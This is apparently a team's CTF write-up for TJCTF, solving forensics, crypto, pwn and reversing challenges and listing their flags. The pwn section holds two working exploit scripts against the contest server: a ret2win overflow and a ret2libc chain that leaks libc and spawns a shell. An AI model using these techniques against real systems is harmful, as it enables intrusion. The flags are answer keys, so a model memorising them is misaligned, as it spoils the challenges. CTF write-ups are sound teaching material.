Forensics

fake-geoguessr

Challenge Description

1
We don't do guess challs here at TJCTF, so that means no Geoguessr 😞 Since I took this photo myself, though, you can find out precisely where it was taken, and some Bonus Content™️, from my Camera Model Name to the Circle Of Confusion. Maybe you'll find a flag there?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
└─$ exiftool lake.jpg                                     
ExifTool Version Number         : 12.41
File Name                       : lake.jpg
[REDACTED]
Copyright                       : tjctf{thats_a_
Exposure Time                   : 1/520
F Number                        : 2.2
Exposure Program                : Program AE
ISO                             : 32
...................................................................
[REDACTED]
Application Record Version      : 4
IPTC Digest                     : b443520a10119da99c2550175e6d0efb
Comment                         : lot_of_metadata}
[REDACTED]
...................................................................

Flag : tjctf{thats_a_lot_of_metadata}

cool-school

Challenge Description

1
Wow TJ is such a cool school! This image really captures the vibes. But something seems off about the image...

I used StegSolve for this challenge

Untitled

Flag : tjctf{lol_st3g_s0_co0l}

spongebob

Challenge Description

1
TJCTF is really cool and spongebob thinks so too. So cool in fact...wait a minute, isn't the meme usually 4 squares???

Using TweakPNG software we change the Height of the image to 1000 or any big value and save the changes.

forensics

We open the image again and we get our flag

image.png

Flag : tjctf{such_pogg3rs_ctf}

sneaker-zipper

1
Sometimes the zippers can be sneaky...

For this challenge I unzipped the chall.zip file using CyberChef

forensics

Then I saved the output as a text file , when I opened it I found the flag.

forensics

Flag : tjctf{sneakers_with_zippers_are_hip_no?_874d174bb26fcf95}

Crypto

rsa-apprentice

Challenge Description

1
My friend sent me this secret message but I can't figure out how to decrypt it! Can you help?

We are given a problem.txt file which contains our RSA numbers 

1
2
3
4
5
==== SECRET RSA MESSAGE ====
n = 1216177716507739302616478655910148392804849
e = 65537
c1 = 257733734393970582988408159581244878149116
c2 = 843105902970788695411197846605744081831851

The flag is divided across two parts. Since we have c1 and c2 we need to find d1 and d2 to get the two parts of the flag.

solver_part1.py

1
2
3
4
5
6
7
8
9
10
11
12
13
from Crypto.Util.number import *

n = 1216177716507739302616478655910148392804849
e = 65537
c1 = 257733734393970582988408159581244878149116

p = 1033247481589406269253
q = 1177043968824330681533

phi = (p-1) * (q-1)
d1= pow (e , -1 , phi)
flag1 = pow (c1,d1,p*q)
print (long_to_bytes(flag1))

output

Untitled

solver_part2.py

1
2
3
4
5
6
7
8
9
10
11
12
13
from Crypto.Util.number import *

n = 1216177716507739302616478655910148392804849
e = 65537
c2 = 843105902970788695411197846605744081831851

p = 1033247481589406269253
q = 1177043968824330681533

phi = (p-1) * (q-1)
d2= pow (e , -1 , phi)
flag2 = pow (c2,d2,p*q)
print (long_to_bytes(flag2))

output

Untitled

Flag : tjctf{n0t_s0_S3cur3_Cryp70}

flimsy-fingered-latin-teacher

Challenge Description

1
2
Oh no! My Latin teacher likes to touch type on her Dell laptop, but she has trouble keeping her fingers on the right keys in home row. The letters she's typing out don't really make sense. Can you help me understand what she's saying so she doesn't get upset when I come to her confused?
ykvyg}pp[djp,rtpelru[pdoyopm|

This is a Keyboard Shift Cipher

Untitled

Flag : tjctf{oopshomerowkeyposition}

pwn

vacation-1

Challenge Description

1
2
3
Too much school, too much work, too much writing CTF challenges... can I just go on vacation?

nc tjc.tf 31680

This a simple ret2win challenge

exploit.py

1
2
3
4
from pwn import *
shell = remote('tjc.tf',31680)
shell.sendline(b'A'* 24 + p64(0x40101a) + p64(0x401196))
shell.interactive()

Untitled

Flag : tjctf{wh4t_a_n1c3_plac3_ind33d!_7609d40aeba4844c}

vacation-2

Challenge Description

1
2
3
Travel agency said we can't go there anymore...

nc tjc.tf 31705

Classic ret2libc challenge

exploit.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
from pwn import *

def start(argv=[], *a, **kw):
    if args.GDB:  # Set GDBscript below
        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.REMOTE:  # ('server', 'port')
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    else:  # Run locally
        return process([exe] + argv, *a, **kw)

def find_ip(payload):
    # Launch process and send payload
    p = process(exe)
    p.sendlineafter(b'today?', payload)
    # Wait for the process to crash
    p.wait()
    # Print out the address of EIP/RIP at the time of crashing
    # ip_offset = cyclic_find(p.corefile.pc)  # x86
    ip_offset = cyclic_find(p.corefile.read(p.corefile.sp, 4))  # x64
    info('located EIP/RIP offset at {a}'.format(a=ip_offset))
    return ip_offset

# Specify your GDB script here for debugging
gdbscript = '''
init-pwndbg
break main
continue
'''.format(**locals())

# Set up pwntools for the correct architecture
exe = './chall'
# This will automatically get context arch, bits, os etc
elf = context.binary = ELF(exe, checksec=False)
# Enable verbose logging so we can see exactly what is being sent (info/debug)
context.log_level = 'debug'

# ===========================================================
#                    EXPLOIT GOES HERE
# ===========================================================

# Lib-C library
# libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')  # Local

libc = ELF('libc6_2.31-0ubuntu9.7_amd64.so')  # Remote

# Pass in pattern_size, get back EIP/RIP offset
offset = find_ip(cyclic(1000))

# Start program
io = start()

# POP RDI and ret(stack alignment) from ropper
pop_rdi = 0x401243
ret = 0x40101a

# Payload to leak libc function
payload = flat({
    offset: [
        pop_rdi,
        elf.got.puts,
        elf.plt.puts,
        elf.symbols.main
    ]
})

# Send the payload
io.sendlineafter(b'today?', payload)

io.recvline()  # Receive the newline

# Retrieve got.puts address
got_puts = unpack(io.recv()[:6].ljust(8, b'\x00'))
info("leaked got_puts: %#x", got_puts)

# Subtract puts offset to get libc base
libc.address = got_puts - libc.symbols.puts
info("libc_base: %#x", libc.address)

# System(/bin/sh)
info("system_addr: %#x", libc.symbols.system)
bin_sh = next(libc.search(b'/bin/sh\x00'))
info("bin_sh: %#x", bin_sh)

# Payload to get shell
payload = flat({
    offset: [
        pop_rdi,
        bin_sh,
        ret,
        libc.symbols.system
    ]
})

# Send the payload
io.sendline(payload)

# Got Shell?
io.interactive()

Untitled

Flag : tjctf{w3_g0_wher3_w3_w4nt_t0!_66f7020620e343ff}

Rev

take-a-l

Challenge Description

1
I need W :angry:

We are given a binary to work with

Untitled

main function

Untitled

flag

Untitled

After converting the flag values to decimal we get

102, 120, 113, 102, 116, 105, 117, 117, 117, 115, 127, 119, 96, 97, 97, 97, 97, 97, 97, 97, 97, 97, 39, 97, 111

I just threw them to Cyberchef and converted them from decimal then I did XOR Brute Force

Untitled

Flag : tjctf{gggamersssssssss5s}

I hope You enjoyed the writeups (=^ ◡ ^=)